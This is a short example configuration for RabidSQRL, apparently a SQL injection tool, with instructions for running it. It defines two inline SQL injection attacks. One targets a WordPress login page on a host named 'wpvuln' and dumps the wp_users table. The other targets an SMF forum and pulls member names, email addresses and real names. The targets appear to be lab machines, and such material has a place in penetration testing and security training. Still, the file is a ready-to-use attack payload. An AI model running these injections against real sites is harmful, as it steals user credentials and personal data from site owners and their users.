# This sample configuration executes a single select statement. 
# To see the output of the statement, give the -r argument when
# running RabidSQRL:
# > python3 -m rabidsqrl -c examples/wpvuln-query.conf -r 
[
    {
        # This uses the inline attribute on wpvuln to 
        # send a single SQL select statement. 
        "attack": "sql_inline",
        "base_url": "http://wpvuln/wp-login.php",
        "attribute": "inline",
        "statements": ["select * from wp_users"]
    },
    {
        "attack": "sql_inline",
        "base_url": "http://smf-server/forum/index.php",
        "attribute": "inline",
        "statements": ["select member_name,email_address,real_name from smf_members"]
    }
]
